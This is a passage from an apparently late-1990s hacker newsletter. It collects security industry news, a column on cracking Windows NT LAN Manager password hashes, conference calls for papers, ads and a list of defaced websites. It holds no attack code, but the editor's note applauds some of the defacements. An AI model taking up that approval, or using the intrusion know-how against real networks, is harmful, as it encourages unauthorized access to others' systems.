in Korea with such a talent. Yang Keun-won, head of the National Police Office's computer crime team commented that a virus creator and hacker like Kim could become a "national treasure" in the information society of the future. He added that he will guide Kim along the legal path of computer work. (Park Joon-hyun, jhpark@chosun.com) @HWA 09.0 The l0pht and NFR team up to produce top flight IDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.nfr.net/news/press/19990301-l0pht-filters.html NFR and L0pht to Deliver Best-of-Breed Intrusion Detection L0pht to use extensive knowledge of attack signatures to expand filter set for NFR software 01 March 1999 Washington, DC and Boston, MA Network Flight Recorder« (Bloomberg Ticker: 9022Z EQUITY) and L0pht Heavy Industries, Inc. today announced a strategic relationship that redefines the boundaries for cooperation in intrusion detection. In a partnership that combines the respected "white-hat" knowledge of attack signatures with the industry leading intrusion detection engine, L0pht will create a large set of backends for the NFR software. The backends, or filters, will provide users with real-time alerts for various types of intrusions and unwanted activity on their networks, including information gathering, denial of service, and network attacks. As soon as the NFR system is attached to the network, the new backends will begin watching for common and obscure attacks. New backends, which will be provided to users on a monthly basis, will watch for the latest attacks. Administrators can automatically push the new backends to remote NFR systems, without having to upgrade or modify any software. Because the backends will be written in N-Code, NFR's flexible open-standard traffic analysis specification language, users can examine and verify the underlying code, or modify them to match their internal security policies. Commenting on the partnership, Marcus J. Ranum, President and CEO of Network Flight Recorder, noted, "L0pht has an amazing depth of information about system vulnerabilities, and are the ideal source for cutting edge intrusion detection signatures. By adding their 'white-hat' knowledge to our existing capabilities, we have an unbeatable combination. Today, NFR is the most popular intrusion detection and monitoring system for many of our users based on its powerful customizable capabilities – with the formation of this partnership we further cement our lead in the industry." In a recent user poll, NFR soundly outperformed intrusion detection products from Axent (NASDAQ: AXNT), ISS (NASDAQ: ISSX), and Cisco (NASDAQ: CSCO). "When real network managers and users rate your product as best, that’s satisfying," continues Ranum. "Our product shines where it matters the most: solving real problems and securing real networks for real network managers." "Having the ability to handle strange network traffic in a flexible manner and the ability to tweak even the lowest level components of the intrusion detection engine offers a functionality scope and comfort level that other products simply cannot attain," said Dr. Mudge of L0pht Heavy Industries, Inc. "In this field the consumer is really purchasing an elevation in ‘peace-of-mind’ about the way their network works. This cannot be done on blind faith alone. NFR was the only commercial package capable of being used for intrusion detection that released full source code to the academic community. Combine this with the network and computer security expertise that is found at L0pht and the history that L0pht has for being a ‘consumer watchgroup’ – the two companies working together on projects was a logical next step." Availability The L0pht intrusion detection backends will be included in the next commercial release of the NFR software, scheduled for availability in early second quarter 1999. NFR software can be purchased from certified NFR resellers worldwide. About Network Flight Recorder (NFR) Network Flight Recorder, with offices around the United States and resellers worldwide, is a leading developer of intrusion detection, network traffic, and network analysis tools. The flexibility of the NFR software provides effective local and distributed misuse detection solutions for small, medium, and large environments. NFR’s highly customizable technology is deployed at more than 1,000 sites worldwide, including financial institutions, government, military and intelligence agencies, and Fortune 500 firms. NFR news and company information can be found on The Bloomberg under the ticker symbol: 9022Z EQUITY and on the World Wide Web at http://www.nfr.net. About L0pht Heavy Industries, Inc. L0pht [L0PHT] Heavy Industries, Inc., has been recognized as a collection of some of the top hackers in the US. Since the early 90s, L0pht has acted as a consumer watchgroup and underground engineering team whose goal has been improving computer and network security while educating users, programmers, and corporations. In 1997, L0pht released their Windows NT password-auditing tool, L0phtCrack, which quickly became the defacto standard auditing tool for both government and the commercial sector. On May 18, 1998, they presented expert testimony to the United States Senate on government systems security. The L0pht has appeared in Wired Magazine, Byte Magazine, various academic journals, BBC, The Washington Post, and numerous other publications. http://www.L0pht.com. Contact Network Flight Recorder Barnaby Page 202.662.1400 barnaby_page@nfr.net L0pht Heavy Industries http://www.l0pht.com [L0PHT] press@l0pht.com -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 10.0 A good example of how "Secure" NT really is ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Network Computing via Techweb http://www.techweb.com/se/directlink.cgi?NWC19990308S0022 March 08, 1999, Issue: 1005 Section: Columnists With Friends Like These... Art Wittmann A couple of freelance writers are working on a story for us about security auditing and protection. As part of their "research," they decided to see if they could hack into one of our lab networks. It took them only a few hours to successfully break into our Windows NT boxes. And from there, they learned the configuration of our lab networks, the server names and functions, the operating systems we run and most of the passwords on the key accounts on our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a good many of our routers and switches. Our lab is not run as a mission-critical production network-it isn't meant to be particularly secure. But we do stay up to date on most service packs and patches for the major operating systems. So, unless you've taken a very active stance on security for your network, you should be worried. Reusing Passwords? The hacking expertise of these guys is by no means unique. Plenty of people out there can do what they did, and some can do it better. While NT has its fair share of vulnerabilities out of the box, there is a LAN Manager issue that blows the doors wide open. In summary: NT stores password hashes in a format that is hard to crack by brute-force methods, and that's a good thing. However, Microsoft has chosen to maintain compatibility with LAN Manager's password store, and therefore keeps a second hash of passwords. This table isn't so secure. In fact, brute-force methods usually can come up with a few passwords in short order. Within two hours, our hackers had obtained 5,000 of our 5,045 passwords by brute-forcing them. A few days and millions of keystrokes later, using those same passwords, they owned the entire network. So, do you use the same passwords across all platforms? The problem is exacerbated for smaller shops where a single crew administers NT, NetWare, Unix and other systems because they tend to use the same administrator password for all systems under the group's management. For very obvious reasons, that's a bad idea. Our lab was no exception, and our hackers quickly infiltrated our NetWare and Unix servers, as well as our Cisco routers. Instructions for cleaning up this hole in NT are provided in the Microsoft Knowledge Base article Q147706. However, doing so may break applications that still use the LAN Manager hash table. In particular, if you're still using DOS or Windows 3.1, problems are likely. And if you're running OS/2 LAN Manager, implementing Microsoft's fix will break compatibility. From what I've read about this security hole in the writings from the hacker community, Service Pack 3 contains a number of security fixes that make it harder to crack passwords. These should be implemented, but regardless, LANMan compatibility needs to be disabled if you want your NT server to be secure. Expect Little Help From Microsoft Of course, Microsoft doesn't promote the fact that a security hole exists or that it can be patched. If you're clever enough to know about it and to ask the right questions, the company will provide a fix. In my opinion, that's something akin to Ford putting a sticky note on the bulletin board outside the CEO's office about a little Pinto gas-tank problem and then claiming that the hazard was adequately publicized. Finally, you'd think that Windows 2000 would be the perfect place for Microsoft to rid itself of this problem, wouldn't you? Well, just like me, you'd be wrong. It turns out that Microsoft is committed to maintaining LANMan compatibility in Windows 2000 out of the box. The moral of the story is clear: The onus is on you to protect the integrity of your systems; Microsoft is not going to go out of its way to help you. You must dedicate staff to following the security advisories about all your operating systems-simply looking at the vendor's home pages is not enough. A good many of the hackers out there publicize the security holes they know about. It's my advice that you heed them well. Send your comments on this column to Art Wittmann at awittmann@nwc.com. Copyright « 1999 CMP Media Inc. @HWA 11.0 The Black Hat Briefings Security Conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From the [ISN] list) Forwarded From: Jeff Moss <jm@defcon.org> The Black Hat Briefings '99 http://www.blackhat.com/ July 7 - 8th, Las Vegas, Nevada Computer Security Conference Announcement Computer Security Conference Description and Overview It's late. You're in the office alone, catching up on some system administration tasks. Behind you, your network servers hum along quietly, reliably. Life is good. No one can get to your data or disrupt your WAN. The network is secure. Or is it? While we could create more fear, uncertainty, and doubt (FUD), we would rather announce The Black Hat Briefings '99 conference! The Black Hat Briefings conference series was created to provide in-depth information about current and potential threats against computer systems by the people who discover the threats. To do this, we assemble a group of vendor neutral security professionals and let them talk candidly about the security problems businesses face and the solutions they see to those problems. No gimmicks, just straight talk by people who make it their business to explore the ever-changing security space. While many conferences focus on information and network security, only The Black Hat Briefings will put your managers, engineers, and software programmers face-to-face with today's cutting edge computer security experts and "underground" security specialists. New for 1999, there will be three tracks of speaking. The "White Hat" track will inform your CEO or CIO with no-nonsense information about what issues to be aware of, and what they can ignore. The two "Black Hat" tracks will provide your technical staff with nitty-gritty technical information about current and potential threats to your computer systems. Only the Black Hat Briefings conference will provide your staff with the pragmatic tools and knowledge they need to help thwart those lurking in the shadows of your fire wall or the depths of your company's WAN. The reality is they are out there [back to the FUD]. The choice is yours--you can live in fear of them, or you can learn from people like them. Conference Overview Spanning two days with three separate tracks, The Black Hat Briefings will focus on the vital security issues facing organizations with large Enterprise networks and mixed network operating systems. Topics will Include Intrusion Detection Systems (IDS), Computer Forensics (CF)systems, Incident Response, Hostile Mobile Code, vulnerability analysis, secure programming techniques, tool selection for creating and effectively monitoring your networks, and management issues related to computer security. You will be put face-to-face with the people developing the tools used by and against hackers. This year the Black Hat Briefings has grown to include a separate track specifically designed for the CEO and CIO. This third track, nick named the "White Hat" track, was developed by the National Computer Security Center (NCSC) of the National Security Agency. While the other tracks have a technology focus, this track is for people who have to manage an organization's security posture. What should you look for when hiring an outside security consultant? Should you even look outside your organization? What are the potential security threats? What should you do to reduce the risk of losses due to computer security incidents? The "White Hat" track will help you answer these questions. The Black Hat Briefings has developed a reputation for lively and in-depth presentations and discussions between "underground" security celebrities, vendors, and attendees. This year you can expect more visual demonstrations, more speakers who are authoritative in their fields, and, as always, an excellent time. As an added bonus, people who attend The Black Hat Briefings get free admission to DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las Vegas. For more information see the DEFCON web site at http://www.defcon.org/. Speakers Current Speakers include the following. - Bruce Schneier, author of Blowfish, TwoFish and Applied Cryptography. - Marcus Ranum, CEO of Network Flight Recorder and designer of the first commercial fire wall. - Dominique Brezinski, Network Security Consultant. - Greg Hogland, Author of the Asmodeous NT scanner and the Web Trends security scanner. - Peter Stephenson, Principle consultant of the Intrusion Management and Forensics Group. - The Simple Nomad, of the Nomad Mobile Research Centre More speakers will be listed as the call for papers ends on March 15th. Location The Venetian Resort and Casino Las Vegas, NV (http://www.venetian.com/) Registration Costs Registration costs are $995 US before June 14th 1998. Late registration fees are $1,195 after June 14th. You may cancel your registration before July 1st for a full refund. This fee includes two days of speaking, materials, a reception, and meals. To register, please visit http://www.blackhat.com/ Sponsors Secure Computing Corporation (http://www.securecomputing.com/) The National Computer Security Center (NCSC) Network Flight Recorder (http://www.nfr.com/) Counterpane Systems (http://www.counterpane.com/) Aventail (http://www.aventail.com/) More Information email: blackhat@defcon.org with email questions or visit http://www.blackhat.com/ for the latest speakers and events listings. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 12.0 CQRE (Secure) Congress and Exhibition ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Detlef [iso-8859-1] Hⁿhnlein" <huehnlein@secunet.de> *************************************************************** Call for Papers CQRE [Secure] Congress & Exhibition Duesseldorf, Germany, Nov. 30 - Dec. 2 1999 --------------------------------------------------------------- provides a new international forum covering most aspects of information security with a special focus to the role of information security in the context of rapidly evolving economic processes. --------------------------------------------------------------- Deadline for submission of extended abstracts: May 14, 1999 website: http://www.secunet.de/forum/cqre.html mailing-list: send mailto:cqre@secunet.de (where the subject is "subscribe" without paranthesis) *************************************************************** The "CQRE - secure networking" provides a new international forum giving a close-up view on information security in the context of rapidly evolving economic processes. The unprecedented reliance on computer technology transformed the previous technical side- issue "information security'' to a management problem requiring decisions of strategic importance. Hence, the targeted audience represents decision makers from government, industry, commercial, and academic communities. If you are developing solutions to problems relating to the protection of your countryÆs information infrastructure or a commercial enterprise, consider submitting a paper to the "CQRE - secure networking" conference. We are looking for papers and panel discussions covering: .. electronic commerce - new business processes - secure business transactions - online merchandising - electronic payment / banking - innovative applications .. network security - virtual private networks - security aspects in internet utilization - security aspects in multimedia- applications - intrusion detection systems .. legal aspects - digital signatures acts - privacy and anonymity - crypto regulation - liability .. corporate security - access control - secure teleworking - enterprise key management - IT-audit - risk / disaster management - security awareness and training - implementation, accreditation, and operation of secure systems in a government, business, or industry environment .. security technology - cryptography - public key infrastructures - chip card technology - biometrics .. trust management - evaluation of products and systems - international harmonization of security evaluation criterias .. standardization .. future perspectives Any other contribution addressing the involvement of IT security in economic processes will be welcome. Authors are invited to submit an extended abstract of their contribution to the program chair. The submissions should be original research results, survey articles or ``high quality'' case studies and position papers. Product advertisements are welcome for presentation, but will not be considered for the proceedings. Manuscripts must be in English, and not more than 2.000 words. The extended abstracts should be in a form suitable for anonymous review, with no author names, affiliations, acknowledgements or obvious references. Contributions must not be submitted in parallel to any conference or workshop that has proceedings. Separately, an abstract of the paper with no more than 200 words and with title, name and addresses (incl. an E-mail address) of the authors shall be submitted. In the case of multiple authors the contacting author must be clearly identified. We strongly encourage electronic submission in Postscript format. The submissions must be in 11pt format, use standard fonts or include the necessary fonts. Proposals for panel discussions should also be sent to the program chair. Panels of interest include those that present alternative/controversial viewpoints or those that encourage lively discussions of relevant issues. Panels that are collections of unrefereed papers will not be considered. Panel proposals should be a minimum of one page describing the subject matter, the appropriateness of the panel for this conference and should identify participants and their respective viewpoints. mailing list/ web-site: ----------------------- If you want to receive emails with subsequent Call for Papers and registration information, please send a brief mail to cqre@secunet.de. You will find this call for papers and further information at http://www.secunet.de/forum/cqre.html . important dates: ---------------- deadline for submission of extended abstracts May 14, 1999 deadline for submission of panel proposals June 1, 1999 notification of acceptance June 25, 1999 deadline for submission of complete papers July 30, 1999 program chair: -------------- secunet - Security Networks GmbH c/o Rainer Baumgart Weidenauer Str. 223 - 225 57076 Siegen Germany Tel.: +49-271-48950-15 Fax: +49-271-48950-50 R.Baumgart@secunet.de program committee: ------------------ Johannes Buchmann (TU Darmstadt) Dirk Fox (Secorvo) Walter Fumy (Siemens) Rⁿdiger Grimm (GMD) Helena Handschuh (ENST/Gemplus) Thomas Hoeren (Uni Muenster) Pil Joong Lee (POSTECH) Alfred Menezes (U.o.Waterloo/Certicom) David Naccache (Gemplus) Clifford Neumann (USC) Mike Reiter (Bell Labs) Matt Robshaw (RSA) Richard Schlechter (EU-comm.) Bruce Schneier (Counterpane) Tsuyoshi Takagi (NTT) Yiannis Tsiounis (GTE Labs) Michael Waidner (IBM) Moti Yung (CERTCO) Robert Zuccherato (Entrust) -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 13.0 Canc0n99 the grassroots con for North America ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This promises to be quite the event, even although nothing is carved in stone yet since it is early days the tentative dates are Aug 19th-22nd "somewhere in Niagara Falls" region right near the tourist trap. Several venues are under consideration and the dates are flexible and may change to suit speaker availablity. We're still looking for people that are willing to speak or people that want to submit papers to have introduced at the c0n, send in your proposals now to be sure that you have a space on the schedule with papers and talks aside there will be sightseeing and the opportunity to party and generally socialize with the younger set it should prove quite interesting all around from professors to "punk ass hax0rs" ;-) some of the people may surprise you and that will be the key to success for this con.fun.it will be a fun event with tshirts and other giveaways to show you were there...don't miss out, register in advance and this will probably be the most fun you can have for a measly $15 Cdn ($10 US) cd burning parties, for linux / bsd cd's etc (byocds) visit http://come.to/canc0n99 for up to date news as it becomes available. For those interested there are pre-con T-Shirts available for $20 Cdn with the hwa logo (pictures to come on the site) send in your order requests to the main email and you will be notified when they are ready to ship, all proceeds go towards making the con a better event and dj equipment etc....this is a NON PROFIT event!!!! we're hoping to break even at best so get as many of your friends together as you can and order a cool T-shirt or preregister for the con and help us make it a huge success. Vendors welcome see site for details. SPEAKERS wanted! interested? email us your idea/proposal... @HWA 14.0 Countering Cyberterrorism ~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov> Courtesy of Cryptography List. Originally From: Clifford Neuman <bcn@ISI.EDU> Countering Cyber-Terrorism June 22-23 Marina del Rey, California A workshop sponsored by the Information Sciences Institute of the University of Southern California Call for Participation Recent studies warn of Cyber-Terrorism and the vulnerability of our computer systems and infrastructure to attack. These reports identify damage that determined, knowledgeable, and well-financed adversaries could inflict on commercial, government, and military systems. Such attacks would have severe consequences for the public, and in particular the economy, which has become dependant on computers and communications infrastructure. The objective of this workshop is to identify things that should be done to improve our ability to detect, protect against, contain, neutralize, mitigate the effects of, and recover from cyber-terrorist attacks. Participants are sought from the computer security, electronic commerce and banking, network infrastructure, military, and counter-terrorism communities, as well as those with experience of cyber-terrorist attacks. Recommendations may suggest research and development or operational measures that can be taken. The workshop is NOT a forum for presentation of the latest security systems, protocols or algorithms. The workshop will address the strategies, framework, and infrastructure required to combine and incrementally deploy such technologies to counter the cyber-terrorist threat. Attendance will be limited to approximately 25 participants. Participants will be selected on the basis of submitted position papers that raise issues for the workshop to discuss, identify threats or countermeasures, or propose strategies or infrastructure to counter the threat of cyber-terrorism. Position papers should be four pages or less in length. Submissions should be sent in e-mail in Word or PDF format, or as ASCII text to cyber-terrorism-ws@isi.edu. Please check the web page http://www.isi.edu/cctws for more information, including a position paper from the organizers which will be available two weeks prior to the submission deadline. Important Dates: Organizer's Paper Available April 5, 1999 Position Papers Due April 19, 1999 Notification of Acceptance May 1, 1999 Revised Position Papers Due May 28, 1999 Position Papers Available on Web June 9 Workshop Dates June 22-23 Organizing Committee: Bob Balzer, Information Sciences Institute, Balzer@isi.edu Thomas Longstaff, CERT Coordination Center, tal@cert.org Don Faatz, the MITRE Corporation, dfaatz@mitre.org Clifford Neuman, Information Sciences Institute, bcn@isi.edu -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA -=- :. .: -=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA H.W Hacked websites Feb 28th-March 7th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) In the last release we mentioned that www.hackernews.com's server was showing only the directory structure and no site was available also that the www.l0pht.com server was not accepting http requests, neither site was indeed hacked they were both merely down for maintenance, but it was 'reported' here as a possible hack since I didn't have time to confirm or deny the report by contacting the admins before the issue went out, hope it didn't cause too much of an annoyance to anyone and my apologies to both hackernews and the l0pht for any alarmism perceived or imagined by the report 8-o - Ed March 11th Raza-Mexicana's crack National Commission of Human Rights web page and replaced it with a political message. archived by HNN at http://www.hackernews.com/archive/crackarch.html http://www.cndh.org.mx March 10th contributed by Anonymous Cracked We have reports that the following sites have been compromnised, some of them by the RAzaMExicana Hackers TEam. http://www.unca.edu.ar http://biblioweb.dgsca.unam.mx/revistas http://biblioweb.dgsca.unam.mx/AGN http://www.digital-holding.no http://www.efo.no http://www.prestkvern.no http://www.usoft.no http://www.waaler.no http://www.input.nohttp://www.input.no News of these sites was contributed to Help Net Security by Deepcase and HNN by anonymous Cracked March 6th/7th http://www.tcedge.com http://www.home-listings.com http://www.eecsys.com http://www.globestf.com http://www.rossi-consulting.com http://www.ircn.com http://www.neslabinc.com http://www.des-con-systems.com http://resource-central.com/ http://totalarmstrength.com/ http://www.landbridge.gov.cn/ http://www.softwaresuccess.com/ http://www.pwr1.com http://www.montgomeryhospice.com/ http://wrair-www.army.mil/ http://ohrm.niddk.nih.gov/ http://www.gunmetalblue.com http://www.all-the-marbles.com http://www.neslabinc.com http://www.rossi-consulting.com http://www.cleanstart.com http://www.netzero.net http://www.netsnitch.com http://www.eranorton.com http://www.ritop.com http://www.tcedge.com http://www.home-listings.com http://www.eecsys.com http://www.globestf.com http://www.eyecare-experts.com http://www.hitecdentist.com @HWA _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news (r) Cruciphux is a trade mark of Hunted & Wounded Associates -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]